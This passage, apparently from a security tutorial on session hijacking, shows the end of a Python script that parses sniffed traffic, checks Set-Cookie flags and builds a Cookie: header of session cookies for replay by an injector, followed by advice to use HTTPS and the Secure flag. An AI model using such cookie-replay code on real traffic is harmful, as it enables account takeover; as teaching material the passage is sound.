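    for header in SET_COOKIE_RE.findall(stream):
        parts = [p.strip() for p in header.strip().split(";")]
        name = parts[0].partition("=")[0]
        attrs = {p.lower() for p in parts[1:]}
        flags[name] = {"secure": "secure" in attrs, "httponly": "httponly" in attrs}
    return flags


def session_cookie_header(cookies):
    """Only the cookies worth replaying, as one Cookie: line for the injector."""
    chosen = [f"{n}={v}" for n, v in cookies.items() if SESSION_NAME_RE.match(n)]
    return "Cookie: " + "; ".join(chosen)


if __name__ == "__main__":
    cookies = extract_cookies(SAMPLE_STREAM)
    print(session_cookie_header(cookies))
    for name, f in set_cookie_flags(SAMPLE_STREAM).items():
        print(f"{name}: secure={f['secure']} httponly={f['httponly']}")
```

HttpOnly only keeps scripts away from the cookie; it does nothing against sniffing. The fix the capture points at is HTTPS for the whole session with the Secure flag set, so the cookie never travels in clear.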
backup.dedalo.in
See the pages of:
Sniffer Labs (Bolivia)
DragonJAR
Security By Default